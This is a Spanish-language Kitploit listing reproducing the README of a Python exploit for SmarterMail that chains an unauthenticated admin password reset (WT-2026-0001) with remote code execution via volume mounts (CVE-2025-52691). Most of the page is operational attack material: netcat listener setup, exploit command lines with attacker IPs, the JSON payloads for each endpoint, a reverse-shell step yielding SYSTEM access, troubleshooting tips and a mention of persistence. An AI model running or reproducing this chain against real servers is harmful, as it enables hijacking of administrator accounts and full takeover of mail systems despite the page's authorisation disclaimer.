Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001 — CVE-2025-52691 PoC: Basado en el artículo WT-2026-0001 de watchtowr sobre una explotación de omisión de autenticación, este es un script de ataque funcional en Python. | Kitploit
Herramientas/GitHubGitHub/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónRed TeamingHerramienta de Acceso Remoto
GitHubninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001

CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001

CVE-2025-52691 PoC: Basado en el artículo WT-2026-0001 de watchtowr sobre una explotación de omisión de autenticación, este es un script de ataque funcional en Python.

Ver Repositorio
7hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-52691 / WT-2026-0001 Exploit de SmarterMail

🚨 AVISO IMPORTANTE

¡Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos!

  • El uso no autorizado es ilegal y poco ético
  • Úsela solo en sistemas con autorización explícita
  • Úsela bajo su propio riesgo
  • Los usuarios son responsables de cumplir con todas las leyes aplicables

📋 Resumen

Este exploit combina dos vulnerabilidades críticas en SmarterMail:

  1. CVE-2025-52691: Ejecución remota de código (RCE) previa autenticación mediante carga de archivos
    • Puntuación CVSS: 10.0 (Crítica)
    • Versiones afectadas: Build 9406 y anteriores, Build 16.3.6989.16341 y anteriores
    • Versiones corregidas: Build 9413 y posteriores

https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691

  1. WT-2026-0001: Omisión de autenticación mediante restablecimiento de contraseña
    • CVE-ID no asignado
    • Versiones afectadas: Hasta Build 9510
    • Versiones corregidas: Build 9511 (15 de enero de 2026)

https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/

Vector de ataque

El exploit realiza un ataque en 3 fases:

  1. Fase 1: Omisión de autenticación mediante WT-2026-0001

    • Cambiar la contraseña de administrador sin verificación de la contraseña anterior
  2. Fase 2: Inicio de sesión como administrador con la nueva contraseña

    • Autenticarse en la interfaz web de SmarterMail
  3. Fase 3: RCE mediante la funcionalidad de montajes de volumen

    • Crear un montaje de volumen con un comando de shell inverso
    • Ejecutar comandos del SO con privilegios de SYSTEM

Prerrequisitos

Requisitos del sistema

  • Python 3.6+
  • Netcat (nc)
  • curl
  • Linux/macOS/Windows (WSL)

Instrucciones de instalación

root@kitploit:~
# Instalar Python 3 (si no está disponible)
# Ubuntu/Debian
sudo apt update && sudo apt install python3 python3-pip

# macOS
brew install python3

# Windows (WSL)
wsl --install

# Instalar netcat
# Ubuntu/Debian
sudo apt install netcat

# macOS
brew install netcat

# Windows (WSL)
sudo apt install netcat-traditional

Instalar dependencias

root@kitploit:~
# Dependencias de Python (si es necesario)
pip3 install requests

Inicio rápido

Método 1: Configuración automatizada (recomendado)

root@kitploit:~
# Hacer ejecutable
chmod +x run_exploit.sh

# Configuración automatizada
./run_exploit.sh --auto

# O configuración interactiva
./run_exploit.sh

Método 2: Ejecución directa

root@kitploit:~
# Configurar listener (en una terminal)
nc -lvnp 4444

# Ejecutar exploit (en una segunda terminal)
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Método 3: Con todas las opciones

root@kitploit:~
python3 exploit.py \
  -H http://192.168.1.100 \
  -P 9998 \
  -A 192.168.1.50 \
  -p 4444 \
  -d \
  --admin-username admin \
  --new-password "MySecurePassword123!"

Instrucciones detalladas

Paso 1: Preparación

  1. Identificación del objetivo

    root@kitploit:~
    # Verificar el host objetivo
    curl -I http://192.168.1.100:9998
    
    # Identificar la versión de SmarterMail
    # (Normalmente en la página de inicio de sesión o en los encabezados HTTP)
    
  2. Configuración del listener

    root@kitploit:~
    # En la Terminal 1: Iniciar listener
    nc -lvnp 4444
    
    # El listener debe estar ejecutándose antes de ejecutar el exploit
    
  3. Validación de la red

    root@kitploit:~
    # Asegurar que la conexión entre atacante y objetivo sea posible
    ping 192.168.1.100
    nc -zv 192.168.1.100 9998
    

Paso 2: Ejecución del exploit

root@kitploit:~
# Con el script runner (recomendado)
./run_exploit.sh

# O directamente con Python
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Paso 3: Después del exploit

  1. Conexión de shell

    root@kitploit:~
    # En la terminal del listener, debería aparecer una conexión
    # Debería tener un shell SYSTEM
    
  2. Verificar acceso

    root@kitploit:~
    # En el shell obtenido
    whoami
    hostname
    ipconfig /all  # Windows
    ifconfig       # Linux
    
  3. Acceso persistente

    root@kitploit:~
    # Opcional: Configurar persistencia
    # Windows: Instalar como servicio
    # Linux: Tarea cron o servicio systemd
    

🔧 Opciones de configuración

Parámetros de Exploit.py

ParámetroDescripciónValor por defecto
-H, --hostHost objetivo (obligatorio)-
-P, --portPuerto objetivo9998
-A, --attacker-ipIP del atacante para shell inverso (obligatorio)-
-p, --attacker-portPuerto del atacante para shell inverso (obligatorio)-
-d, --debugActivar modo debugFalse
--admin-usernameNombre de usuario administradoradmin
--new-passwordNueva contraseña de administradorNewPassword123!@#

Parámetros de Run_Exploit.sh

ParámetroDescripción
-t, --targetHost objetivo
-p, --portPuerto objetivo
-a, --attacker-ipIP del atacante
-l, --listener-portPuerto del listener
-n, --new-passwordNueva contraseña de administrador
-u, --admin-userNombre de usuario administrador
-d, --debugModo debug
--autoModo automatizado

Ejemplos

Ejemplo 1: Uso básico

root@kitploit:~
# Terminal 1: Iniciar listener
nc -lvnp 4444

# Terminal 2: Ejecutar exploit
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Ejemplo 2: Con credenciales personalizadas

root@kitploit:~
python3 exploit.py \
  -H https://mail.company.com \
  -P 443 \
  -A 10.0.0.1 \
  -p 8080 \
  --admin-username administrator \
  --new-password "ComplexPassword123!@#"

Ejemplo 3: Modo debug

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

Ejemplo 4: Configuración automatizada

root@kitploit:~
./run_exploit.sh --auto

Detalles técnicos

Fase 1: Omisión de autenticación

Endpoint: POST /api/v1/auth/force-reset-password

Payload:

root@kitploit:~
{
  "IsSysAdmin": "true",
  "OldPassword": "dummy",
  "Username": "admin",
  "NewPassword": "NewPassword123!@#",
  "ConfirmPassword": "NewPassword123!@#"
}

Respuesta de éxito:

root@kitploit:~
{
  "success": true,
  "resultCode": 200,
  "debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n"
}

Fase 2: Inicio de sesión como administrador

Endpoint: POST /api/v1/auth/login

Payload:

root@kitploit:~
{
  "username": "admin",
  "password": "NewPassword123!@#"
}

Fase 3: RCE mediante montajes de volumen

Endpoint: POST /api/v1/settings/volume-mounts

Payload:

root@kitploit:~
{
  "name": "random_volume_name",
  "path": "C:\\Temp\\random_volume_name",
  "command": "powershell reverse shell command",
  "enabled": true,
  "type": "command"
}

Solución de problemas

Problemas comunes

1. Puerto bloqueado

root@kitploit:~
# Error: "Conexión rechazada"
# Solución: Verificar el cortafuegos y abrir el puerto
sudo ufw allow 9998

2. Listener no accesible

root@kitploit:~
# Error: "Conexión fallida"
# Solución: Verificar la configuración del listener
nc -lvnp 4444

3. Autenticación fallida

root@kitploit:~
# Error: "Inicio de sesión fallido"
# Solución: Verificar la versión del objetivo (debe ser vulnerable)

5. RCE fallido

root@kitploit:~
# Error: "Creación de montaje de volumen fallida"
# Solución: Verificar privilegios de administrador, sistema objetivo

Modo debug

Active el modo debug para obtener una salida detallada:

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

⚠️ Notas de seguridad

Aspectos legales

  • Solo realice pruebas autorizadas
  • Obtenga permiso por escrito
  • Asegure el cumplimiento de las leyes locales
  • No realice pruebas en sistemas de producción

Precauciones de seguridad

  1. Entorno de prueba: Siempre pruebe en entornos controlados
  2. Validación del objetivo: Asegúrese de que el objetivo sea un sistema de prueba
  3. Aislamiento de red: Separe los sistemas de prueba de la red de producción
  4. Documentación: Documente todas las pruebas
  5. Limpieza: Elimine todos los rastros después de las pruebas

Uso responsable

  • No cause daños
  • No robe ni manipule datos
  • No deshabilite sistemas
  • Sea transparente con las partes responsables

Actualizaciones y mantenimiento

Notas de la versión

  • v1.0: Versión inicial con funcionalidad completa
  • Actualizaciones futuras: Mejoras en el manejo de errores y estabilidad

🙏 Agradecimientos

  • watchTowr Labs por la investigación original
  • Comunidad de investigación en seguridad por el apoyo
  • Todos los que contribuyeron a las mejoras

⚠️ Recuerde: Un gran poder conlleva una gran responsabilidad

Descargar herramienta